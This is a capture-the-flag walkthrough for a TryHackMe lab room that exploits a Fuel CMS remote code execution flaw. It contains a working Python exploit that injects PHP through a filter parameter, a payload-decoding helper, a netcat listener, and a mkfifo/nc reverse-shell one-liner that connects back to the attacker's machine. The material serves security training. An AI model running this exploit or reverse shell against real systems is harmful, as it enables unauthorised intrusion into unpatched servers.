The Vulnerability Capstone Room is the final room in a series of three rooms created by https://tryhackme.com/p/cmnatic to teach people about vulnerabilities in software.
The room is available at https://tryhackme.com/room/vulnerabilitycapstone
Start the machine and wait the required 3 minutes for it to boot before browsing to it.
Question 1 – What is the name of the application running on the vulnerable machine?
Question 1 Answer – Browse to the machine's IP address in a web browser; the application's name is shown on the front page.
Question 2 – What is the version number of this application?
Question 2 Answer – The version number is also shown on the front page.
Question 3 – What is the number of the CVE that allows an attacker to remotely execute code on this application?
Question 3 Answer – Browse to https://www.exploit-db.com/ (or run searchsploit locally) and search for the name and version of the application running; the matching exploit entry lists the CVE. A hint is that it is CVE-2018-XXXXX
The exploit code is available from searchsploit on your local machine or from https://www.exploit-db.com, but it needs to be modified to work: the original script is written for Python 2 and sends every request through a Burp proxy on localhost, so it fails with a connection error unless Burp is running. Use the modified code below instead, remembering to change x.x.x.x to the room's IP address:
import requests
from urllib.parse import quote  # Python 3; the exploit-db script used Python 2's urllib.quote

URL = "http://x.x.x.x"  # change x.x.x.x to the room's IP address (no trailing slash)


def find_nth_overlapping(haystack, needle, n):
    """Return the index of the n-th occurrence of needle in haystack (-1 if absent)."""
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start + 1)
        n -= 1
    return start


while True:
    xxxx = input('cmd:').strip()
    # The original script used Python 2's input(), which evaluates what you type,
    # so commands had to be entered as quoted strings ("whoami"); accept that
    # form here too by stripping one pair of surrounding quotes.
    if len(xxxx) >= 2 and xxxx[0] == xxxx[-1] and xxxx[0] in "\"'":
        xxxx = xxxx[1:-1]
    # filter = '+pi(print($a='system'))+$a('<cmd>')+'  URL-encoded and injected
    # into the page filter that Fuel CMS evaluates as PHP
    url = URL + "/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27" + quote(xxxx) + "%27%29%2b%27"
    r = requests.get(url)
    # The vulnerable page prints the command output twice; cut the response at
    # the second occurrence of its first 20 characters so it is shown once.
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text, begin, 2)
    print(r.text[0:dup] if dup > 0 else r.text)
This gives you a very limited shell: each command you type is sent in a new HTTP request and its output is printed back. Because the original exploit used Python 2's input(), which evaluates whatever is typed, commands should be entered as a quoted string, like this:
"whoami"
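To see what the encoded filter parameter actually sends, and how the exploit trims the doubled output, here is an added example that is not part of the room or of the exploit-db script. It decodes the payload into the PHP that the vulnerable filter evaluates and applies the exploit's trimming rule to a constructed HTTP response body, so it runs offline; the base URL, the commands and the response body are made-up inputs, and the function names are this example's own.

```python
from urllib.parse import quote, unquote

# URL-encoded fragments copied from the exploit above; the command goes between them.
ENCODED_PREFIX = ("%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d"
                  "%27%29%29%2b%24%61%28%27")
ENCODED_SUFFIX = "%27%29%2b%27"

# Constructed response body (not captured from a real target): the vulnerable
# page renders the command output twice, followed by the normal HTML.
SAMPLE_BODY = ("uid=33(www-data) gid=33(www-data)\n" * 2
               + "<!DOCTYPE html><html><body>Fuel CMS page</body></html>")


def build_url(base, cmd):
    """Build the request URL the exploit sends for one shell command."""
    return (base.rstrip("/") + "/fuel/pages/select/?filter="
            + ENCODED_PREFIX + quote(cmd) + ENCODED_SUFFIX)


def decode_payload(cmd):
    """Return the PHP that the filter value evaluates to for a given command.

    The leading quote closes the string the filter value lands in and '+'
    concatenates extra expressions onto it: pi(print($a='system')) assigns
    the string 'system' to $a as a side effect, and $a('<cmd>') then calls
    system() with the command.
    """
    return unquote(ENCODED_PREFIX + quote(cmd) + ENCODED_SUFFIX)


def extract_output(body, prefix_len=20):
    """Keep only the first copy of the command output.

    Same rule as the exploit's find_nth_overlapping(r.text, begin, 2): take the
    first prefix_len characters and cut the body at their second occurrence.
    Unlike the exploit, an unmatched prefix returns the whole body instead of
    silently dropping its last character.
    """
    marker = body[:prefix_len]
    second = body.find(marker, 1)
    return body if second < 0 else body[:second]


if __name__ == "__main__":
    print(build_url("http://x.x.x.x/", "whoami"))
    print(decode_payload("id -u"))
    print(extract_output(SAMPLE_BODY), end="")
```

Running it prints the full request URL, the decoded PHP `'+pi(print($a='system'))+$a('id -u')+'`, and a single copy of the constructed output line. Note that quote() percent-encodes spaces and shell metacharacters, which is why multi-word commands survive the trip through the query string.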
You can get a slightly more usable shell by catching a reverse shell with netcat. First, open another terminal on your machine and run the following command:
nc -nvlp 4444
This starts a netcat listener waiting for a connection on port 4444. You are free to change 4444 to whatever port you prefer, as long as you use the same port in the next step.
Now, through the exploit shell on the Vulnerability Capstone machine, run the command below, replacing x.x.x.x with the IP address of your own machine (the one running the listener), not the room's IP:
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"
This creates a named pipe, attaches an interactive /bin/sh to it and uses netcat to relay the shell's input and output to your waiting listener, so you now have a much better shell. For more information about this command, see the pentestmonkey Reverse Shell Cheat Sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Now simply change to the /home/ubuntu folder and look for the flag.txt file.
Once you have the flag, the room is complete.